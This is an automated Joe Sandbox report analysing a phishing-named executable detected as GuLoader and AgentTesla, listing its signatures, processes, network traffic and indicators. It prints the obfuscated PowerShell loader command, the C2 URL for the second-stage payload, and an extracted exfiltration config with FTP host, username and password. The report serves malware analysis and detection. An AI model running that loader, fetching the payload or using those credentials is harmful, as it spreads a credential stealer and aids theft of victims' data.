Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Shipping documents 000309498585956000797900.exe

Overview

General Information

Sample name:Shipping documents 000309498585956000797900.exe
Analysis ID:1520706
MD5:94c700b33fb2a1aa2bd02f13750cca75
SHA1:abe3abd4f60778dfa694a8fc54b9d1037a248132
SHA256:9f40759902174555ab1294eb92ae2d17ad2698d2e0e68694edbb9684bdab7692
Tags:exeSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Shipping documents 000309498585956000797900.exe (PID: 764 cmdline: "C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe" MD5: 94C700B33FB2A1AA2BD02F13750CCA75)
    • powershell.exe (PID: 6396 cmdline: "powershell.exe" -windowstyle minimized "$Mahjongg=Get-Content 'C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151';$Chefen128=$Mahjongg.SubString(11975,3);.$Chefen128($Mahjongg)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 3876 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.3309605845.0000000024C59000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000006.00000002.3309605845.0000000024C31000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.3309605845.0000000024C31000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000001.00000002.2916363321.000000000C87B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: msiexec.exe PID: 3876JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries

            System Summary

            barindex
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 84.38.133.140, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3876, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49714
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6396, TargetFilename: C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Mahjongg=Get-Content 'C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151';$Chefen128=$Mahjongg.SubString(11975,3);.$Chefen128($Mahjongg)" , CommandLine: "powershell.exe" -windowstyle minimized "$Mahjongg=Get-Content 'C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151';$Chefen128=$Mahjongg.SubString(11975,3);.$Chefen128($Mahjongg)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe", ParentImage: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe, ParentProcessId: 764, ParentProcessName: Shipping documents 000309498585956000797900.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Mahjongg=Get-Content 'C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151';$Chefen128=$Mahjongg.SubString(11975,3);.$Chefen128($Mahjongg)" , ProcessId: 6396, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-27T18:34:24.433199+020028032702Potentially Bad Traffic192.168.2.54971484.38.133.14080TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Shipping documents 000309498585956000797900.exeAvira: detected
            Source: C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exeAvira: detection malicious, Label: HEUR/AGEN.1357304
            Source: powershell.exe.6396.1.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}
            Source: C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exeReversingLabs: Detection: 21%
            Source: Shipping documents 000309498585956000797900.exeReversingLabs: Detection: 21%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability
            Source: Shipping documents 000309498585956000797900.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49715 version: TLS 1.2
            Source: Shipping documents 000309498585956000797900.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: tem.Core.pdb source: powershell.exe, 00000001.00000002.2915880878.00000000081B1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2912347917.0000000007007000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB[ source: powershell.exe, 00000001.00000002.2906379045.00000000029CF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB source: powershell.exe, 00000001.00000002.2906379045.00000000029CF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2915999268.00000000081C8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2912347917.0000000007007000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeCode function: 0_2_00406719 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00406719
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeCode function: 0_2_004065CF FindFirstFileW,FindClose,0_2_004065CF
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeCode function: 0_2_00402B75 FindFirstFileW,0_2_00402B75
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49714 -> 84.38.133.140:80
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /MQLoRGjADyYzKXcZrWGSjs213.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 84.38.133.140Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: unknownTCP traffic detected without corresponding DNS query: 84.38.133.140
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /MQLoRGjADyYzKXcZrWGSjs213.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 84.38.133.140Cache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: ftp.concaribe.com
            Source: msiexec.exe, 00000006.00000002.3291573272.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3308837948.0000000024260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://84.38.133.140/MQLoRGjADyYzKXcZrWGSjs213.bin
            Source: msiexec.exe, 00000006.00000002.3291573272.00000000007FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://84.38.133.140/MQLoRGjADyYzKXcZrWGSjs213.bin~
            Source: msiexec.exe, 00000006.00000002.3309605845.0000000024C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://concaribe.com
            Source: powershell.exe, 00000001.00000002.2912266214.0000000006ED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m$
            Source: msiexec.exe, 00000006.00000002.3309605845.0000000024C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.concaribe.com
            Source: Shipping documents 000309498585956000797900.exe, 00000000.00000000.2041425401.0000000000409000.00000002.00000001.01000000.00000003.sdmp, Shipping documents 000309498585956000797900.exe, 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error...
            Source: powershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.2907254415.0000000004826000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.2907254415.00000000046D1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3309605845.0000000024BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.2907254415.0000000004826000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.2907254415.00000000046D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: msiexec.exe, 00000006.00000002.3309605845.0000000024BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: msiexec.exe, 00000006.00000002.3309605845.0000000024BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: msiexec.exe, 00000006.00000002.3309605845.0000000024BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: powershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000001.00000002.2907254415.0000000004826000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49715 version: TLS 1.2
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeCode function: 0_2_00404B30 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404B30

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: Shipping documents 000309498585956000797900.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeCode function: 0_2_004036FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036FC
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeCode function: 0_2_0040441E0_2_0040441E
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeCode function: 0_2_004075FE0_2_004075FE
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeCode function: 0_2_00406EA80_2_00406EA8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0675EBD81_2_0675EBD8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0675F4A81_2_0675F4A8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0675E8901_2_0675E890
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0675D7AA1_2_0675D7AA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_067514F51_2_067514F5
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0037E3706_2_0037E370
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_00374A586_2_00374A58
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_003741886_2_00374188
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0037AAB06_2_0037AAB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0037AAAA6_2_0037AAAA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_00373E406_2_00373E40
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2798A7DC6_2_2798A7DC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_2798BE006_2_2798BE00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_279A23806_2_279A2380
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_279AB3006_2_279AB300
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_279A77606_2_279A7760
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_279A56A06_2_279A56A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_279A7E406_2_279A7E40
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_279A5DC86_2_279A5DC8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_279AE4686_2_279AE468
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_279AC2406_2_279AC240
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_279A00386_2_279A0038
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_279A00406_2_279A0040
            Source: Shipping documents 000309498585956000797900.exeStatic PE information: invalid certificate
            Source: Shipping documents 000309498585956000797900.exe, 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebjlkevrkets subprofessor.exel& vs Shipping documents 000309498585956000797900.exe
            Source: Shipping documents 000309498585956000797900.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/15@2/3
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeCode function: 0_2_004036FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036FC
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeCode function: 0_2_00404085 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,EnableWindow,0_2_00404085
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeCode function: 0_2_0040234F CoCreateInstance,0_2_0040234F
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeFile created: C:\Users\user\AppData\Roaming\chondriosomeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_03
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeFile created: C:\Users\user\AppData\Local\Temp\nsl1945.tmpJump to behavior
            Source: Shipping documents 000309498585956000797900.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Shipping documents 000309498585956000797900.exeReversingLabs: Detection: 21%
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeFile read: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe "C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe"
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Mahjongg=Get-Content 'C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151';$Chefen128=$Mahjongg.SubString(11975,3);.$Chefen128($Mahjongg)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Mahjongg=Get-Content 'C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151';$Chefen128=$Mahjongg.SubString(11975,3);.$Chefen128($Mahjongg)" Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exeSection loaded: textinputframework.dllJump to behavior
